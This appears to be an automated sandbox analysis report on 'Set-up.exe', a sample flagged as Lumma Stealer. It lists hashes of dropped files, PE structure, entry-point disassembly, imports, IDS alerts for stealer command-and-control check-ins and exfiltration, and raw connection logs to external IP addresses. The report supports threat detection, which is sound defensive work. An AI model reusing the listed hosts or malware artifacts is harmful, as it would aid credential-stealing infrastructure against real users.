                                                                                                                      C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dllinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                        @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                            installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                        cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                          C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                              MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):64
                                                                                                                                                Entropy (8bit):1.1510207563435464
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                                                MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                                                SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                                                SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                                                SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:@...e.................................,..............@..........
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6447207
                                                                                                                                                Entropy (8bit):7.998441497232368
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):8767044
                                                                                                                                                Entropy (8bit):7.960152326344281
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):35616
                                                                                                                                                Entropy (8bit):6.953519176025623
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: appFile.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FloydMounts.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: cho_mea64.exe, Detection: malicious, Browse
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6144
                                                                                                                                                Entropy (8bit):4.720366600008286
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3367424
                                                                                                                                                Entropy (8bit):6.530011244733973
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):35616
                                                                                                                                                Entropy (8bit):6.953519176025623
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6144
                                                                                                                                                Entropy (8bit):4.720366600008286
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3367424
                                                                                                                                                Entropy (8bit):6.530011244733973
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):846325235
                                                                                                                                                Entropy (8bit):0.13954043794048707
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:
                                                                                                                                                MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):0.45213366655733644
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:Set-up.exe
                                                                                                                                                File size:75'269'806 bytes
                                                                                                                                                MD5:b92ee6aff573d5f6aec1cfd748fe3ccb
                                                                                                                                                SHA1:203fd74f67e7013de56b3dc56e44d816437cc960
                                                                                                                                                SHA256:ba34710ae9f0fe471ded943e84a8dbce2ad241fe550dc3e4e66a5062a978058c
                                                                                                                                                SHA512:b6894a00781a8a77ce4ec0ea7caf66a2e5a51e517478dca00f35880f149c951eeac1cbf98f1c344d2cb57f5cbfc3182414349a8b9be75dc5c8b6d221c663cdd4
                                                                                                                                                SSDEEP:24576:fzJcU2+gtvvkECK7NrnI4KjbLTK39rNtrOct:fzJF2+gv/rnITjzKtrNtSct
                                                                                                                                                TLSH:28F76CBF5730BFB08B42C4650936DEDC95FA690A131194E7334A6D06FD8B8D84B3A86D
                                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                                Entrypoint:0x46d354
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:
                                                                                                                                                Time Stamp:0x4DAC88CC [Mon Apr 18 18:54:04 2011 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:341ad42f1c1323de5177f7ee5eace0b4
                                                                                                                                                Signature Valid:false
                                                                                                                                                Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                Error Number:-2146869232
                                                                                                                                                Not Before, Not After
                                                                                                                                                • 15/12/2020 22:24:20 02/12/2021 22:24:20
                                                                                                                                                Subject Chain
                                                                                                                                                • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                Version:3
                                                                                                                                                Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                                                                Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                                                                Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                                                                Serial:33000003DFFB6AE3F427ECB6A30000000003DF
                                                                                                                                                Instruction
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                push FFFFFFFFh
                                                                                                                                                push 0047CC90h
                                                                                                                                                push 0046D27Ch
                                                                                                                                                mov eax, dword ptr fs:[00000000h]
                                                                                                                                                push eax
                                                                                                                                                mov dword ptr fs:[00000000h], esp
                                                                                                                                                sub esp, 10h
                                                                                                                                                push ebx
                                                                                                                                                push esi
                                                                                                                                                push edi
                                                                                                                                                mov dword ptr [ebp-18h], esp
                                                                                                                                                call dword ptr [0047A190h]
                                                                                                                                                xor edx, edx
                                                                                                                                                mov dl, ah
                                                                                                                                                mov dword ptr [00493434h], edx
                                                                                                                                                mov ecx, eax
                                                                                                                                                and ecx, 000000FFh
                                                                                                                                                mov dword ptr [00493430h], ecx
                                                                                                                                                shl ecx, 08h
                                                                                                                                                add ecx, edx
                                                                                                                                                mov dword ptr [0049342Ch], ecx
                                                                                                                                                shr eax, 10h
                                                                                                                                                mov dword ptr [00493428h], eax
                                                                                                                                                push 00000001h
                                                                                                                                                call 00007F2FF0C75EA9h
                                                                                                                                                pop ecx
                                                                                                                                                test eax, eax
                                                                                                                                                jne 00007F2FF0C74C7Ah
                                                                                                                                                push 0000001Ch
                                                                                                                                                call 00007F2FF0C74D20h
                                                                                                                                                pop ecx
                                                                                                                                                call 00007F2FF0C7574Dh
                                                                                                                                                test eax, eax
                                                                                                                                                jne 00007F2FF0C74C7Ah
                                                                                                                                                push 00000010h
                                                                                                                                                call 00007F2FF0C74D0Fh
                                                                                                                                                pop ecx
                                                                                                                                                and dword ptr [ebp-04h], 00000000h
                                                                                                                                                call 00007F2FF0C770F3h
                                                                                                                                                call dword ptr [0047A18Ch]
                                                                                                                                                mov dword ptr [004962BCh], eax
                                                                                                                                                call 00007F2FF0C77EE2h
                                                                                                                                                mov dword ptr [004933A8h], eax
                                                                                                                                                call 00007F2FF0C77C8Bh
                                                                                                                                                call 00007F2FF0C77BCDh
                                                                                                                                                call 00007F2FF0C75AC0h
                                                                                                                                                mov eax, dword ptr [00493444h]
                                                                                                                                                mov dword ptr [00493448h], eax
                                                                                                                                                push eax
                                                                                                                                                push dword ptr [0049343Ch]
                                                                                                                                                push dword ptr [00493438h]
                                                                                                                                                call 00007F2FF0C0CB0Dh
                                                                                                                                                add esp, 0Ch
                                                                                                                                                Programming Language:
                                                                                                                                                • [ C ] VS98 (6.0) SP6 build 8804
                                                                                                                                                • [C++] VS98 (6.0) SP6 build 8804
                                                                                                                                                • [ C ] VS2010 build 30319
                                                                                                                                                • [ASM] VS2010 build 30319
                                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x889f4 | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x99000 | 0x4fc00 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x47c64de | 0x21d0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x7a000 | 0x238 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x787e1 | 0x78800 | 54dc9034f855123270a7abbb716ae1a9 | False | 0.5701727016338174 | data | 6.685258921744927 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x7a000 | 0xf618 | 0xf800 | b0cfc3329743aaf81f3c7aaabc54ddb3 | False | 0.30344317036290325 | data | 4.073250457877279 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x8a000 | 0xd2e4 | 0x6800 | e977665f5c53c9f3cbb67e8f4bf8906f | False | 0.28662109375 | data | 3.3790025727805575 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .sxdata | 0x98000 | 0x4 | 0x200 | 35925cfdc1176bd9ffc634a58b40ec17 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x99000 | 0x4fc00 | 0x4fc00 | fbe670598d6c0d31bb517a3bbc4e467f | False | 0.6865938479623824 | data | 7.579823470331887 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x99058 | 0x2ac | data | Chinese | China | 0.5248538011695907 |
| DLL | Import |
|---|---|
| OLEAUT32.dll | SysAllocString, SysAllocStringByteLen, VariantClear, VariantCopy, SysFreeString |
| USER32.dll | CharLowerA, CharNextA, CharUpperW, CharLowerW, CharPrevExA, CharUpperA |
| KERNEL32.dll | SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, SetConsoleCtrlHandler, FileTimeToLocalFileTime, GetCommandLineW, SetFileApisToOEM, GetVersionExA, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, GetConsoleMode, SetConsoleMode, GetStdHandle, MultiByteToWideChar, WideCharToMultiByte, GetLastError, FreeLibrary, LoadLibraryW, LoadLibraryA, GetModuleFileNameW, GetModuleFileNameA, LocalFree, FormatMessageW, FormatMessageA, CloseHandle, SetFileTime, CreateFileW, SetLastError, SetFileAttributesW, SetFileAttributesA, RemoveDirectoryW, RemoveDirectoryA, MoveFileW, MoveFileA, CreateDirectoryW, CreateDirectoryA, DeleteFileW, DeleteFileA, GetFullPathNameW, GetFullPathNameA, SetCurrentDirectoryW, SetCurrentDirectoryA, GetCurrentDirectoryW, GetCurrentDirectoryA, GetTempPathW, GetTempPathA, GetCurrentProcessId, GetTickCount, GetCurrentThreadId, FindClose, FindFirstFileW, FindFirstFileA, FindNextFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, DeviceIoControl, ReadFile, WriteFile, GetCurrentProcess, GetProcAddress, CompareFileTime, FileTimeToSystemTime, GetSystemInfo, GlobalMemoryStatus, GetModuleHandleA, DosDateTimeToFileTime, FileTimeToDosDateTime, SystemTimeToFileTime, GetSystemTime, WaitForMultipleObjects, OpenEventA, UnmapViewOfFile, MapViewOfFile, OpenFileMappingA, GetProcessTimes, LocalFileTimeToFileTime, QueryPerformanceCounter, VirtualAlloc, VirtualFree, WaitForSingleObject, CreateEventA, SetEvent, ResetEvent, CreateSemaphoreA, ReleaseSemaphore, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, TlsSetValue, TlsGetValue, ExitThread, GetCommandLineA, GetVersion, ExitProcess, TlsAlloc, SetUnhandledExceptionFilter, TerminateProcess, HeapSize, GetEnvironmentVariableA, HeapDestroy, HeapCreate, IsBadWritePtr, SetHandleCount, GetFileType, GetStartupInfoA, FlushFileBuffers, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, GetEnvironmentStringsW, IsBadReadPtr, IsBadCodePtr, SetStdHandle, GetCPInfo, GetACP, GetOEMCP, InterlockedDecrement, InterlockedIncrement, LCMapStringA |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| Chinese | China | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-30T18:13:09.982569+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:10.457108+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:10.457108+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:10.947979+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:11.455753+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:11.455753+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:12.094144+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:13.209295+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:14.463172+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:16.217302+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:16.674403+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:17.263003+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49712 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:18.312302+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49715 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:18.762335+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49715 | 188.114.96.3 | 443 | TCP |
| 2024-12-30T18:13:19.512924+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49718 | 185.161.251.21 | 443 | TCP |
| 2024-12-30T18:13:20.773091+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49720 | 104.21.37.128 | 443 | TCP |
| 2024-12-30T18:13:21.179793+0100 | 2008438 | ET MALWARE Possible Windows executable sent when remote host claims to send a Text File | 1 | 104.21.37.128 | 443 | 192.168.2.5 | 49720 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                Dec 30, 2024 18:13:12.618134975 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.618156910 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.731549025 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.731621981 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.731723070 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.732040882 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.732064962 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.209192038 CET44349707188.114.96.3192.168.2.5
